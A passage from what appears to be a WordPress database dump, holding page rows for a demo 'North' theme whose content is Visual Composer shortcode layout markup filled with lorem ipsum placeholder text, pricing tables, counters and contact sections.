css=\".vc_custom_1403956257324{background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\"][vc_column width=\"1/1\"][special_heading title=\"Our Skills\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/2\"][vc_progress_bar values=\"55|Design,85|Wordpress,75|HTML&amp;CSS\" bgcolor=\"bar_black\" units=\"%\"][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_progress_bar values=\"70|Photography,75|Web Design,80|Photoshop\" bgcolor=\"bar_black\" units=\"%\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099917341{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i41.jpg?id=539) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\" bg_overlay=\"light\" el_id=\"services\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"OUR SERVICES\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia.\"][services_carousel posts_nr=\"5\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099958560{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}\" darken=\"light\" bg_overlay=\"darker\" color_scheme=\"white\" el_id=\"prices\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Pricing Tables\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Starter\" price=\"$19\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"100\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Standard\" price=\"$39\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"300\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Professional\" price=\"$59\" period=\"per year\" featured=\"yes\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"500\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Platinum\" price=\"$79\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"700\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1404125302141{padding-bottom: 70px !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\" bg_overlay=\"light\"][vc_column width=\"1/1\"][special_heading title=\"Keep in Touch\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\"][vntd_contact_form email=\"prafgon@gmail.com\" label_name=\"Please enter your Name\" label_email=\"Please enter your E-Mail\" label_subject=\"Please enter your Subject\" label_message=\"Please enter your Message\" label_submit=\"Send E-Mail\" id=\"417\" animated=\"no\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405424323297{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}\" bg_overlay=\"darker\" el_id=\"contact\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][contact_block phone=\"0123 456 789\" address=\"NORTH, STREET NAME 6209, MELBOURNE AUSTRALIA\" email=\"SUPPORT@GOLDEYESTHEME.COM\" facebook=\"#\" twitter=\"#\" linkedin=\"#\" youtube=\"#\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405425125857{padding-top: 0px !important;padding-bottom: 0px !important;}\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][gmap lat=\"41.862274\" long=\"-87.701328\" height=\"400\" zoom=\"15\" marker1_title=\"Office 1\" marker1_text=\"Your description goes here.\" marker1_location=\"custom\" marker1_location_custom=\"41.863774,-87.721328\" marker2_title=\"Our other store\" marker2_text=\"My secondary marker description.\" marker2_location=\"41.858774,-87.685328\"][/vc_column][/vc_row]','Home5','','inherit','closed','closed','','711-revision-v1','','','2014-07-15 12:33:02','2014-07-15 12:33:02','',711,'http://highperformingstudent.com/2014/07/15/711-revision-v1/',0,'revision','',0),(717,1,'2014-07-15 13:02:37','2014-07-15 13:02:37','[vc_row css=\".vc_custom_1405429478670{padding-top: 0px !important;padding-bottom: 0px !important;background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/slide41.jpg?id=545) !important;}\" el_id=\"first\" fullwidth=\"yes\" row_width=\"fullwidth\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\" bg_overlay=\"darker\"][vc_column width=\"1/1\"][vntd_fullscreen_slider style=\"style1\" posts_nr=\"6\" bg_overlay=\"dark2\" button1_label=\"Read more\" button1_url=\"#about\" animated=\"no\" text_dynamic=\"We create Awesome Themes!,We are Creative Designers,We love to Design\" buttons_color=\"dark\" text_static=\"Welcome to North! We love to design. We are happy with you are!\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405422234264{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #1f1f1f !important;}\" color_scheme=\"white\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][cta button_title=\"Click me!\" button_url=\"http://\" button_color=\"dark\" button_color_custom=\"#5cbbf5\" text_align=\"left\" fullwidth=\"no\" subtitle=\"It is a long established fact that a reader will be distracted by the readable content of at its layout.\" button1_title=\"Purchase\" button1_url=\"#\" button2_title=\"Get Started\" button2_url=\"#about\" heading=\"Welcome to North!\" style=\"default\"]WELCOME TO NORTH![/cta][/vc_column][/vc_row][vc_row el_id=\"about\"][vc_column width=\"1/1\"][special_heading subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old. Richard McClintock, looked up one of the more obscure\" text_align=\"center\" title=\"About North\" color=\"dark\" animated=\"yes\" margin_bottom=\"65\"]About North[/special_heading][vc_row_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Professional Design\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-desktop\" animated=\"yes\" animation_delay=\"300\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Retina Ready\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-comments-o\" animated=\"yes\" animation_delay=\"500\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"7x24 Support\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-life-ring\" animated=\"yes\" animation_delay=\"700\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Clean Coding\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-flask\" animated=\"yes\" animation_delay=\"900\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row el_id=\"what-we-do\" css=\".vc_custom_1405099060231{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i11.jpg?id=536) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old. Richard McClintock, looked up one of the more obscure\" text_align=\"center\" title=\"What we do\" color=\"white\" animated=\"yes\" margin_bottom=\"0\"]About North[/special_heading][north_tabs tabs=\"%5B%7B%22title%22%3A%22Movie%22%2C%22heading%22%3A%22Movie%22%2C%22text%22%3A%22Contrary%20to%20popular%20belief%2C%20Lorem%20Ipsum%20is%20not%20simply%20random%20text.%20It%20has%20roots%20in%20a%20piece%20of%20classical%20Latin%20literature%20from%2045%20BC%2C%20making%20it%20over%202000%20years%20old.%20Rich%20McClintock%20not%20simply.%20There%20are%20many%20variations%20of%20passages%20of%20Lorem%20Ipsum%20available%2C%20but%20the%20majority%20have%20suffered%20alteration%20in%20some%20form.%22%7D%2C%7B%22title%22%3A%22Landing%22%2C%22heading%22%3A%22Landing%22%2C%22text%22%3A%22There%20are%20many%20variations%20of%20passages%20of%20Lorem%20Ipsum%20available%2C%20but%20the%20majority%20have%20suffered%20alteration%20in%20some%20form%2C%20by%20injected%20humour%2C%20or%20randomised%20words%20which%20don%E2%80%99t%20look%20even%20snormally%20believable.%20If%20you%20are%20going%20to%20use%20a%20passage%20of%20Lorem%20Ipsum%2C%20you%20need%20to%20be%20sure%20there%20isn%E2%80%99t%20anything%20embarrassing%20hidden%20in%20the%20middle%20of%20text.%20All%20the%20Lorem%20Ipsum%20generators%20on%20the%20Internet%20tend%20to%20repeat%20predefined%20chunks%20as%20necessary%2C%20making%20this%20the%20first%20true%20generator%20on%20the%20Internet.%20It%20uses%20a%20dictionary%20of%20over%20200%20Latin%20words%2C%20combined%20with%20a%20handful%20of%20model%20sentence%20structures%2C%20to%20generate%20Lorem%20Ipsum%20which%20looks%20reasonable.%20The%20generated%20Lorem%20Ipsum%20is%20therefore%20always%20free%20from%20repetition%2C%20injected%20humour%2C%20or%20non-characteristic%20words%20etc.%22%7D%2C%7B%22title%22%3A%22Design%22%2C%22heading%22%3A%22Design%22%2C%22text%22%3A%22It%20is%20a%20long%20established%20fact%20that%20a%20reader%20will%20be%20distracted%20by%20the%20readable%20content%20of%20a%20page%20when%20looking%20at%20its%20layout.%20The%20point%20of%20using%20Lorem%20Ipsum%20is%20that%20it%20has%20a%20more-or-less%20normal%20distribution%20of%20letters%2C%20as%20opposed%20to%20using%20%E2%80%98Content%20here%2C%20content%20here%E2%80%99%2C%20making%20it%20look%20like%20readable%20English.%22%7D%2C%7B%22title%22%3A%22Art%22%2C%22heading%22%3A%22Art%22%2C%22text%22%3A%22It%20is%20a%20long%20established%20fact%20that%20a%20reader%20will%20be%20distracted%20by%20the%20readable%20content%20of%20a%20page%20when%20looking%20at%20its%20layout.%20The%20point%20of%20using%20Lorem%20Ipsum%20is%20that%20it%20has%20a%20more-or-less%20normal%20distribution%20of%20letters%2C%20as%20opposed%20to%20using%20%E2%80%98Content%20here%2C%20content%20here%E2%80%99%2C%20making%20it%20look%20like%20readable%20English.%22%7D%5D\"][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css_animation=\"left-to-right\"]\n<h1>PARALLAX WITH DEGRADE</h1>\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock not simply.\n\n[list icon=\"caret-right\" color=\"dark\" background=\"yes\"]\n\n[li]There are many variations of passages.<span style=\"color: #ffffff;\">.</span>[/li]\n\n[li]Contrary to popular belief, Lorem Ipsum is not simply random text.[/li]\n\n[li]Finibus Bonorum et Malorum (The Extremes of Good and Evil) by Cicero.[/li]\n\n[li]Finibus Bonorum et Malorum (The Extremes of Good and Evil) by Cicero.<span style=\"color: #ffffff;\">.</span>[/li]\n\n[li]But I must explain to you how all this mistaken idea<span style=\"color: #ffffff;\">.</span>[/li]\n\n[/list]\n\nSed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium dolorem que laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo.\n\n[button label=\"Read More\" url=\"#\" color=\"black\"][/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_single_image image=\"601\" css_animation=\"right-to-left\" border_color=\"grey\" img_link_target=\"_self\" img_size=\"full\" alignment=\"right\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row el_id=\"facts\"][vc_column width=\"1/1\"][special_heading title=\"WHAT OUR FUN FACTORS\" color=\"dark\" animated=\"yes\" margin_bottom=\"0\"][vc_row_inner][vc_column_inner width=\"1/4\"][counter title=\"Days Worked\" number=\"640\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Projects Finished\" number=\"1250\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Coffee Cups\" number=\"2040\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Pizza Ordered\" number=\"1620\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1406483488171{border-top-width: 1px !important;border-bottom-width: 1px !important;padding-bottom: 50px !important;background-color: #fdfdfd !important;border-color: #eeeeee !important;border-style: solid !important;}\" el_id=\"works\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Portfolio\" color=\"dark\" animated=\"no\" margin_bottom=\"0\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old.\"][portfolio_grid filter=\"yes\" style=\"default\" cols=\"5\" thumb_size=\"square\" paged_posts=\"no\" cats=\"branding,design,photography,video\" thumb_style=\"alt\" more_url=\"http://veented.com/themes/north/portfolio/\" fullwidth=\"no\" thumb_space=\"no\"][/vc_column][/vc_row][vc_row el_id=\"team\"][vc_column width=\"1/1\"][special_heading title=\"Our Creative Team\" color=\"dark\" animated=\"no\" margin_bottom=\"0\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\"][team_carousel posts_nr=\"6\"][/vc_column][/vc_row][vc_row el_id=\"features\" css=\".vc_custom_1405099363182{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i21.jpg?id=537) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][special_heading title=\"Features With Mobile\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical. There are many variations of passages of Lorem Ipsum available.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406709924097{padding-top: 60px !important;}\"][icon_box title=\"Analystic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"right\" icon=\"fa-camera-retro\" animated=\"yes\" animation_delay=\"200\"][icon_box title=\"Web Design\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"right\" icon=\"fa-cog\" animated=\"yes\" animation_delay=\"400\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1405423153057{padding-right: 0px !important;padding-left: 0px !important;}\"][vc_single_image image=\"606\" alignment=\"center\" border_color=\"grey\" img_link_target=\"_self\" img_size=\"full\" css=\".vc_custom_1405099308623{margin-bottom: -250px !important;}\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406709931694{padding-top: 60px !important;}\"][icon_box title=\"Wordpress\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"left\" icon=\"fa-desktop\" animated=\"yes\" animation_delay=\"200\"][icon_box title=\"Graphic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"left\" icon=\"fa-paper-plane-o\" animated=\"yes\" animation_delay=\"400\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1406709939804{padding-top: 100px !important;padding-bottom: 100px !important;}\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1408506234346{padding-top: 0px !important;background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/06/testimonials-1.jpg?id=924) !important;}\" bg_overlay=\"dark\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][testimonials style=\"simple\" posts_nr=\"4\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1404037588724{padding-bottom: 70px !important;}\"][vc_column width=\"1/1\"][special_heading title=\"What Clients Says\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"0\"][testimonials style=\"expanded\" posts_nr=\"4\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1404039027476{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #3a3a3a !important;}\"][vc_column width=\"1/1\"][logos_carousel images=\"568,566,567,563,564,565\" onclick=\"custom_link\" custom_links=\"#,#,#,#,#\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1403955268505{margin-bottom: -15px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/1\"][special_heading title=\"WHY DO YOU CHOOSE NORTH?\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"0\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1409773959059{padding-bottom: 80px !important;}\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" el_id=\"what-we\"][vc_column width=\"1/2\"][vc_tabs][vc_tab title=\"Design\" tab_id=\"1403954748-1-96f2de-a384c686-9309e913-d736\"][vc_column_text]<a href=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone.png\"><img class=\"size-full wp-image-926 alignleft\" src=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone.png\" alt=\"mini-phone\" width=\"164\" height=\"116\" /></a>Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][vc_tab title=\"Company\" tab_id=\"1403954748-2-63f2de-a384c686-9309e913-d736\"][vc_column_text]<a href=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone1.png\"><img class=\"alignright size-full wp-image-927\" src=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone1.png\" alt=\"mini-phone1\" width=\"130\" height=\"165\" /></a>Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][vc_tab title=\"Support\" tab_id=\"1405423831831-2-6c686-9309e913-d736\"][vc_column_text]Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][/vc_tabs][/vc_column][vc_column width=\"1/2\"][vc_accordion][vc_accordion_tab title=\"Awesome Design\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][vc_accordion_tab title=\"Improved Documentation\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][vc_accordion_tab title=\"Clean Coded\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][/vc_accordion][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099662664{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i31.jpg?id=538) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" fullwidth=\"yes\" parallax=\"yes\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Featured Works\" color=\"dark\" animated=\"yes\" subtitle=\"CONTRARY TO POPULAR BELIEF, LOREM IPSUM IS NOT SIMPLY RANDOM TEXT. IT HAS ROOTS IN PIECE OF CLASSICAL. THERE ARE MANY VARIATIONS OF PASSAGES OF LOREM IPSUM AVAILABLE.\"][portfolio_carousel cats=\"branding,design,photography,video\" posts_nr=\"6\" thumb_style=\"alt\"][cta heading=\"super responsive, clean and creative theme\" subtitle=\"This is Photoshop\'s version of Lorem Ipsum. Proin gravida nibh vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum.\" button1_title=\"Our Portfolio\" button1_url=\"#works\" button2_title=\"Keep in Touch\" button2_url=\"#contact\" margin_bottom=\"0\" button1_subtitle=\"click for our all works\" button2_subtitle=\"send us a message\" style=\"centered\" button_color=\"white\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1403956257324{background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\"][vc_column width=\"1/1\"][special_heading title=\"Our Skills\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/2\"][vc_progress_bar values=\"55|Design,85|Wordpress,75|HTML&amp;CSS\" bgcolor=\"bar_black\" units=\"%\"][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_progress_bar values=\"70|Photography,75|Web Design,80|Photoshop\" bgcolor=\"bar_black\" units=\"%\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099917341{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i41.jpg?id=539) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\" bg_overlay=\"light\" el_id=\"services\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"OUR SERVICES\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia.\"][services_carousel posts_nr=\"5\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099958560{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}\" darken=\"light\" bg_overlay=\"darker\" color_scheme=\"white\" el_id=\"prices\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Pricing Tables\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Starter\" price=\"$19\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"100\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Standard\" price=\"$39\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"300\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Professional\" price=\"$59\" period=\"per year\" featured=\"yes\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"500\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Platinum\" price=\"$79\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"700\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1404125302141{padding-bottom: 70px !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\" bg_overlay=\"light\"][vc_column width=\"1/1\"][special_heading title=\"Keep in Touch\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\"][vntd_contact_form email=\"prafgon@gmail.com\" label_name=\"Please enter your Name\" label_email=\"Please enter your E-Mail\" label_subject=\"Please enter your Subject\" label_message=\"Please enter your Message\" label_submit=\"Send E-Mail\" id=\"417\" animated=\"no\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405424323297{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}\" bg_overlay=\"darker\" el_id=\"contact\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][contact_block phone=\"0123 456 789\" address=\"NORTH, STREET NAME 6209, MELBOURNE AUSTRALIA\" email=\"SUPPORT@GOLDEYESTHEME.COM\" facebook=\"#\" twitter=\"#\" linkedin=\"#\" youtube=\"#\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405425125857{padding-top: 0px !important;padding-bottom: 0px !important;}\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][gmap lat=\"41.862274\" long=\"-87.701328\" height=\"400\" zoom=\"15\" marker1_title=\"Office 1\" marker1_text=\"Your description goes here.\" marker1_location=\"custom\" marker1_location_custom=\"41.863774,-87.721328\" marker2_title=\"Our other store\" marker2_text=\"My secondary marker description.\" marker2_location=\"41.858774,-87.685328\"][/vc_column][/vc_row]','Home6','','publish','open','open','','home6','','','2020-10-28 13:47:38','2020-10-28 13:47:38','',0,'http://veented.com/themes/north/?page_id=717',0,'page','',0),(1922,1,'2014-07-15 13:02:37','2014-07-15 13:02:37','[vc_row css=\".vc_custom_1405429478670{padding-top: 0px !important;padding-bottom: 0px !important;background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/slide41.jpg?id=545) !important;}\" el_id=\"first\" fullwidth=\"yes\" row_width=\"fullwidth\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\" bg_overlay=\"darker\"][vc_column width=\"1/1\"][vntd_fullscreen_slider style=\"style1\" posts_nr=\"6\" bg_overlay=\"dark2\" button1_label=\"Read more\" button1_url=\"#about\" animated=\"no\" text_dynamic=\"We create Awesome Themes!,We are Creative Designers,We love to Design\" buttons_color=\"dark\" text_static=\"Welcome to North! We love to design. We are happy with you are!\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405422234264{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #1f1f1f !important;}\" color_scheme=\"white\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][cta button_title=\"Click me!\" button_url=\"http://\" button_color=\"dark\" button_color_custom=\"#5cbbf5\" text_align=\"left\" fullwidth=\"no\" subtitle=\"It is a long established fact that a reader will be distracted by the readable content of at 